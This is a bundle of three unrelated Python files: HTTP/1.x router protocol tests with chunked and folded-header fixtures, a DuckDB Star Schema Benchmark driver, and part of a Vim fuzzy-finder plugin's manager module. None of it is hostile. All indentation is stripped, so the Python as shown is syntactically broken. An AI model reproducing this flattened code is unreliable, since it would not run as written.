ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len",
headers={"Content-Length": "00"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Length': '1'},
expect_body=b'?')),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 4096,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={'Content-Length': '4096'},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/chunked",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'16\r\n'
+ b'Mary had a little pug \r\n'
+ b'1b\r\n'
+ b'Its name was "Skupper-Jack"\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'Mary had a little pug Its name was "Skupper-Jack"')),
(RequestMsg("GET", "/GET/chunked_large",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"transfer-encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
# note: the chunk length does not count the trailing CRLF
body=b'1\r\n'
+ b'?\r\n'
+ b'800\r\n'
+ b'X' * 0x800 + b'\r\n'
+ b'13\r\n'
+ b'Y' * 0x13 + b'\r\n'
+ b'0\r\n'
+ b'Optional: Trailer\r\n'
+ b'Optional: Trailer\r\n'
+ b'\r\n'),
ResponseValidator(expect_headers={'transfer-encoding': 'chunked'},
expect_body=b'?' + b'X' * 0x800 + b'Y' * 0x13)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
[ResponseMsg(100, reason="Continue",
headers={"Blab": 1, "Blob": "?"}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 1,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?')],
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# (RequestMsg("GET", "/GET/no_length",
# headers={"Content-Length": "0"}),
# ResponseMsg(200, reason="OK",
# headers={"Content-Type": "text/plain;charset=utf-8",
# "connection": "close"
# },
# body=b'Hi! ' * 1024 + b'X'),
# ResponseValidator(expect_body=b'Hi! ' * 1024 + b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_02",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"}),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"App-Header-2": "Value 02"})),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'8\r\n'
+ b'12345678\r\n'
+ b'f\r\n'
+ b'abcdefghijklmno\r\n'
+ b'000\r\n'
+ b'\r\n'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Transfer-Encoding": "chunked"},
body=b'01\r\n'
+ b'!\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Transfer-Encoding": "chunked",
"Content-Type": "text/plain;charset=utf-8"},
body=b'80\r\n'
+ b'$' * 0x80 + b'\r\n'
+ b'0\r\n\r\n'),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Transfer-Encoding": "chunked"},
body=b'1\r\n$\r\n0\r\n\r\n'),
ResponseValidator(status=201, expect_body=b'$')
),
]
}
# HTTP/1.0 compliant test cases (no chunked, response length unspecified)
TESTS_10 = {
#
# GET
#
"GET": [
(RequestMsg("GET", "/GET/error",
headers={"Content-Length": 0}),
ResponseMsg(400, reason="Bad breath", error=True),
ResponseValidator(status=400)),
(RequestMsg("GET", "/GET/no_content",
headers={"Content-Length": 0}),
ResponseMsg(204, reason="No Content"),
ResponseValidator(status=204)),
(RequestMsg("GET", "/GET/content_len_511",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Length": 511,
"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 511),
ResponseValidator(expect_headers={'Content-Length': '511'},
expect_body=b'X' * 511)),
(RequestMsg("GET", "/GET/content_len_4096",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
def _do_request(self, client, tests):
for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
|
duckdb.py
|
import json
import datetime, time
import itertools
import duckdb
import decimal
import os
import multiprocessing
from multiprocessing import Queue
import util
import queue
from queue import Empty
import threading
from threading import Thread
import logging
logger = logging.getLogger("ssb")
class SSBDriver:
def init(self, options):
self.isRunning = False
self.requests = queue.Queue() #fifo
self.config = json.load(open(os.path.join(os.path.dirname(__file__),'..','duckdb.config.json')))
def create_connection(self):
connection = duckdb.connect(self.config['dbFilename'])
return connection
def execute_query(self, query):
# get a connection from the pool - block if non is available
sql_statement = query
#logger.info("(%s) %s" % (request.ssb_id,sql_statement))
connection = self.create_connection()
cursor = connection.cursor()
cursor.execute(sql_statement)
data = cursor.fetchall()
# put connection back in the queue so the next thread can use it.
cursor.close()
results = []
for row in data:
results.append(row)
return results
def execute_request(self, request, result_queue, options):
sql_statement = request.sql_statement
#logger.info("(%s) %s" % (request.ssb_id,sql_statement))
# get a connection from the pool - block if non is available
connection = self.create_connection()
cursor = connection.cursor()
request.start_time = util.get_current_ms_time()
cursor.execute(sql_statement)
data = cursor.fetchall()
request.end_time = util.get_current_ms_time()
# put connection back in the queue so the next thread can use it.
cursor.close()
results = []
for row in data:
results.append(row)
request.result = results
result_queue.put(request)
def process_request(self, request, result_queue, options):
self.requests.put((request, result_queue, options))
def process(self):
self.conn = self.create_connection()
# while the workflow is running, pop the latest request from the stack and execute it
while self.isRunning:
try:
requestObject = self.requests.get(timeout=1)
request = requestObject[0]
result_queue = requestObject[1]
options = requestObject[2]
self.execute_request(request, result_queue, options)
except Empty:
# ignore queue-empty exceptions
pass
except Exception as e:
logger.error("exception occurred")
logger.error(e)
raise
self.conn.close()
return
def workflow_start(self):
self.isRunning = True
thread = Thread(target = self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
|
manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import vim
import os
import sys
import json
import time
import operator
import itertools
import threading
import multiprocessing
from functools import partial
from functools import wraps
from .instance import LfInstance
from .cli import LfCli
from .utils import *
from .fuzzyMatch import FuzzyMatch
from .asyncExecutor import AsyncExecutor
from .devicons import (
webDevIconsGetFileTypeSymbol,
removeDevIcons
)
is_fuzzyEngine_C = False
try:
import fuzzyEngine
is_fuzzyEngine_C = True
cpu_count = multiprocessing.cpu_count()
lfCmd("let g:Lf_fuzzyEngine_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyEngine_C = 0")
is_fuzzyMatch_C = False
try:
import fuzzyMatchC
is_fuzzyMatch_C = True
lfCmd("let g:Lf_fuzzyMatch_C = 1")
except ImportError:
lfCmd("let g:Lf_fuzzyMatch_C = 0")
if sys.version_info >= (3, 0):
def isAscii(str):
try:
str.encode("ascii")
return True
except UnicodeEncodeError:
return False
else:
def isAscii(str):
try:
str.decode("ascii")
return True
except UnicodeDecodeError:
return False
def modifiableController(func):
@wraps(func)
def deco(self, *args, **kwargs):
self._getInstance().buffer.options['modifiable'] = True
func(self, *args, **kwargs)
self._getInstance().buffer.options['modifiable'] = False
return deco
def catchException(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
func(self, *args, **kwargs)
except vim.error as e: # for neovim
if str(e) != "b'Keyboard interrupt'" and str(e) != 'Keyboard interrupt':
raise e
elif self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
except KeyboardInterrupt: # <C-C>, this does not work in vim
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
return deco
def ignoreEvent(events):
def wrapper(func):
@wraps(func)
def deco(self, *args, **kwargs):
try:
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = events
func(self, *args, **kwargs)
finally:
vim.options['eventignore'] = saved_eventignore
return deco
return wrapper
#*****************************************************
# Manager
#*****************************************************
class Manager(object):
def __init__(self):
self._autochdir = 0
self._instance = None
self._cli = LfCli()
self._explorer = None
self._content = []
self._index = 0
self._help_length = 0
self._show_help = False
self._selections = {}
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
self._highlight_ids = []
self._orig_line = ''
self._ctrlp_pressed = False
self._fuzzy_engine = None
self._result_content = []
self._reader_thread = None
self._timer_id = None
self._highlight_method = lambda : None
self._orig_cwd = None
self._cursorline_dict = {}
self._empty_query = lfEval("get(g:, 'Lf_EmptyQuery', 1)") == '1'
self._preview_winid = 0
self._is_previewed = False
self._match_ids = []
self._vim_file_autoloaded = False
self._arguments = {}
self._getExplClass()
#**************************************************************
# abstract methods, in fact all the functions can be overridden
#**************************************************************
def _getExplClass(self):
"""
this function MUST be overridden
return the name of Explorer class
"""
raise NotImplementedError("Can't instantiate abstract class Manager "
"with abstract methods _getExplClass")
def _defineMaps(self):
pass
def _defineCommonMaps(self):
normal_map = lfEval("get(g:, 'Lf_NormalMap', {})")
if "_" not in normal_map:
return
for [lhs, rhs] in normal_map["_"]:
# If a buffer-local mapping does not exist, map it
maparg = lfEval("maparg('{}', 'n', 0, 1)".format(lhs))
if maparg == {} or maparg.get("buffer", "0") == "0" :
lfCmd("nnoremap <buffer> <silent> {} {}".format(lhs, rhs))
def _cmdExtension(self, cmd):
"""
this function can be overridden to add new cmd
if return true, exit the input loop
"""
pass
@removeDevIcons
def _argaddFiles(self, files):
# It will raise E480 without 'silent!'
lfCmd("silent! argdelete *")
for file in files:
lfCmd("argadd %s" % escSpecial(file))
def _issue_422_set_option(self):
if lfEval("has('nvim')") == '1' and self._is_previewed:
lfCmd("silent! setlocal number<")
lfCmd("silent! setlocal relativenumber<")
lfCmd("silent! setlocal cursorline<")
lfCmd("silent! setlocal colorcolumn<")
lfCmd("silent! setlocal winhighlight<")
def _acceptSelection(self, *args, **kwargs):
pass
def _getDigest(self, line, mode):
"""
this function can be overridden
specify what part in the line to be processed and highlighted
Args:
mode: 0, return the full path
1, return the name only
2, return the directory name
"""
if mode == 0:
return line
elif mode == 1:
return getBasename(line)
else:
return getDirname(line)
def _getDigestStartPos(self, line, mode):
"""
this function can be overridden
return the start position of the digest returned by _getDigest()
Args:
mode: 0, return the start postion of full path
1, return the start postion of name only
2, return the start postion of directory name
"""
if mode == 0 or mode == 2:
return 0
else:
return lfBytesLen(getDirname(line))
def _createHelp(self):
return []
def _setStlMode(self, **kwargs):
if self._cli.isFuzzy:
if self._getExplorer().supportsNameOnly():
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
else:
mode = 'Fuzzy'
else:
mode = 'Regex'
modes = {"--nameOnly", "--fullPath", "--fuzzy", "--regexMode"}
for opt in kwargs.get("arguments", {}):
if opt in modes:
if opt == "--regexMode":
mode = 'Regex'
elif self._getExplorer().supportsNameOnly():
if opt == "--nameOnly":
mode = 'NameOnly'
elif opt == "--fullPath":
mode = 'FullPath'
else: # "--fuzzy"
if self._cli.isFullPath:
mode = 'FullPath'
else:
mode = 'NameOnly'
elif opt in ("--nameOnly", "--fullPath", "--fuzzy"):
mode = 'Fuzzy'
break
self._getInstance().setStlMode(mode)
self._cli.setCurrentMode(mode)
def _beforeEnter(self):
self._resetAutochdir()
self._cur_buffer = vim.current.buffer
def _afterEnter(self):
if self._vim_file_autoloaded == False:
category = self._getExplorer().getStlCategory()
if category == 'Colorscheme':
category = 'Colors'
lfCmd("silent! call leaderf#%s#a_nonexistent_function()" % category)
self._vim_file_autoloaded = True
if "--nowrap" in self._arguments:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal nowrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:false)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = False
else:
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal wrap')" % self._getInstance().getPopupWinId())
elif self._getInstance().getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'wrap', v:true)" % self._getInstance().getPopupWinId())
else:
self._getInstance().window.options['wrap'] = True
if self._getInstance().getWinPos() != 'popup':
self._defineMaps()
self._defineCommonMaps()
id = int(lfEval("matchadd('Lf_hl_cursorline', '.*\%#.*', 9)"))
self._match_ids.append(id)
else:
lfCmd("""call win_execute({}, 'let matchid = matchadd(''Lf_hl_cursorline'', ''.*\%#.*'', 9)')"""
.format(self._getInstance().getPopupWinId()))
id = int(lfEval("matchid"))
self._match_ids.append(id)
if is_fuzzyEngine_C:
self._fuzzy_engine = fuzzyEngine.createFuzzyEngine(cpu_count, False)
def _beforeExit(self):
if self._getInstance().window.valid:
self._getInstance().cursorRow = self._getInstance().window.cursor[0]
self._getInstance().helpLength = self._help_length
self.clearSelections()
self._getExplorer().cleanup()
if self._fuzzy_engine:
fuzzyEngine.closeFuzzyEngine(self._fuzzy_engine)
self._fuzzy_engine = None
if self._reader_thread and self._reader_thread.is_alive():
self._stop_reader_thread = True
self._closePreviewPopup()
if self._getInstance().getWinPos() == 'popup':
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._match_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._match_ids = []
def _afterExit(self):
pass
def _bangEnter(self):
self._preview_open = False
self._current_mode = 'NORMAL'
if self._getInstance().getWinPos() == 'popup':
self._cli.hideCursor()
if lfEval("exists('*leaderf#%s#NormalModeFilter')" % self._getExplorer().getStlCategory()) == '1':
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', '%s')" % (self._getInstance().getPopupWinId(),
'leaderf#%s#NormalModeFilter' % self._getExplorer().getStlCategory()))
else:
lfCmd("call leaderf#ResetPopupOptions(%d, 'filter', function('leaderf#NormalModeFilter', [%d]))"
% (self._getInstance().getPopupWinId(), id(self)))
self._resetHighlights()
if self._cli.pattern and self._index == 0:
self._search(self._content)
if len(self._getInstance().buffer) < len(self._result_content):
self._getInstance().appendBuffer(self._result_content[self._initial_count:])
def _bangReadFinished(self):
if self._preview_open == False and self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._previewResult(False)
self._preview_open = True
def _getList(self, pairs):
"""
this function can be overridden
return a list constructed from pairs
Args:
pairs: a list of tuple(weight, line, ...)
"""
return [p[1] for p in pairs]
def _getUnit(self):
"""
indicates how many lines are considered as a unit
"""
return 1
def _supportsRefine(self):
return False
def _previewInPopup(self, *args, **kwargs):
pass
def _closePreviewPopup(self):
if lfEval("has('nvim')") == '1':
if self._preview_winid:
if int(lfEval("nvim_win_is_valid(%d) == v:true" % self._preview_winid)):
lfCmd("noautocmd call nvim_win_close(%d, 1)" % self._preview_winid)
self._preview_winid = 0
else:
if self._preview_winid:
lfCmd("noautocmd call popup_close(%d)" % self._preview_winid)
self._preview_winid = 0
def _previewResult(self, preview):
if self._getInstance().getWinPos() == 'floatwin':
self._cli.buildPopupPrompt()
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
if self._orig_line != self._getInstance().currentLine:
self._closePreviewPopup()
else:
return
if not self._needPreview(preview):
return
line = self._getInstance().currentLine
if lfEval("get(g:, 'Lf_PreviewInPopup', 0)") == '1':
line_nr = self._getInstance().window.cursor[0]
self._previewInPopup(line, self._getInstance().buffer, line_nr)
return
orig_pos = self._getInstance().getOriginalPos()
cur_pos = (vim.current.tabpage, vim.current.window, vim.current.buffer)
saved_eventignore = vim.options['eventignore']
vim.options['eventignore'] = 'BufLeave,WinEnter,BufEnter'
try:
vim.current.tabpage, vim.current.window = orig_pos[:2]
line_nr = self._getInstance().window.cursor[0]
self._acceptSelection(line, self._getInstance().buffer, line_nr, preview=True)
lfCmd("augroup Lf_Cursorline")
lfCmd("autocmd! BufwinEnter <buffer> setlocal cursorline<")
lfCmd("augroup END")
finally:
if self._getInstance().getWinPos() != 'popup':
vim.current.tabpage, vim.current.window, vim.current.buffer = cur_pos
vim.options['eventignore'] = saved_eventignore
def _restoreOrigCwd(self):
if self._orig_cwd is None:
return
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
try:
if int(lfEval("&autochdir")) == 0 and lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
except:
if lfGetCwd() != self._orig_cwd:
chdir(self._orig_cwd)
def _needExit(self, line, arguments):
return True
def setArguments(self, arguments):
self._arguments = arguments
def getArguments(self):
return self._arguments
#**************************************************************
@ignoreEvent('BufWinEnter,BufEnter')
def _createPopupModePreview(self, title, source, line_nr, jump_cmd):
"""
Args:
source:
if the type is int, it is a buffer number
if the type is str, it is a file name
"""
self._is_previewed = True
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2
else:
maxwidth = min(width, int(lfEval("&columns")))
relative = 'editor'
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
lfCmd("let scratch_buffer = nvim_create_buf(0, 1)")
lfCmd("call setbufline(scratch_buffer, 1, content)")
lfCmd("call nvim_buf_set_option(scratch_buffer, 'bufhidden', 'wipe')")
float_window = self._getInstance().window
float_win_row = int(float(lfEval("nvim_win_get_config(%d).row" % float_window.id)))
float_win_col = int(float(lfEval("nvim_win_get_config(%d).col" % float_window.id)))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
anchor = "NW"
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
row = float_win_row + float_window.height + statusline_height
col = float_win_col
height = int(lfEval("&lines")) - row - 2
if height < 1:
return
width = float_window.width
elif preview_pos.lower() == 'top':
anchor = "SW"
row = float_win_row - 1
col = float_win_col
height = row
if height < 1:
return
width = float_window.width
else:
anchor = "SW"
start = int(lfEval("line('w0')")) - 1
end = int(lfEval("line('.')")) - 1
col_width = float_window.width - int(lfEval("&numberwidth")) - 1
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
row = float_win_row + delta_height
col = float_win_col + int(lfEval("&numberwidth")) + 1 + float_window.cursor[1]
height = row
width = maxwidth
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
if isinstance(source, int):
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (source, str(config))))
else:
self._preview_winid = int(lfEval("nvim_open_win(scratch_buffer, 0, %s)" % str(config)))
lfCmd("let g:Lf_PreviewWindowID[%d] = %d" % (id(self), self._preview_winid))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldmethod', 'manual')" % self._preview_winid)
if lfEval("exists('+cursorlineopt')") == '1':
lfCmd("call nvim_win_set_option(%d, 'cursorlineopt', 'both')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'winhighlight', 'Normal:Lf_hl_popup_window')" % self._preview_winid)
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
if not isinstance(source, int):
lfCmd("doautocmd filetypedetect BufNewFile %s" % source)
lfCmd("silent! %foldopen!")
lfCmd("norm! zz")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
# lfCmd("redraw!") # maybe we don't need it, it makes the preview slow
else:
popup_window = self._getInstance().window
popup_pos = lfEval("popup_getpos(%d)" % popup_window.id)
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
if isinstance(source, int):
buffer_len = len(vim.buffers[source])
else:
try:
lfCmd("let content = readfile('%s', '', 4096)" % escQuote(source))
except vim.error as e:
lfPrintError(e)
return
buffer_len = int(lfEval("len(content)"))
preview_pos = lfEval("get(g:, 'Lf_PopupPreviewPosition', 'top')")
if preview_pos.lower() == 'bottom':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
if self._getInstance().getPopupInstance().statusline_win:
statusline_height = 1
else:
statusline_height = 0
line = int(popup_pos["line"]) + int(popup_pos["height"]) + statusline_height
pos = "topleft"
maxheight = int(lfEval("&lines")) - line
if maxheight < 1:
return
if buffer_len >= maxheight: # scrollbar appear
maxwidth -= 1
elif preview_pos.lower() == 'top':
maxwidth = int(popup_pos["width"])
col = int(popup_pos["col"])
# int(popup_pos["line"]) - 1(exclude the first line) - 1(input window) - 1(title)
maxheight = int(popup_pos["line"]) - 3
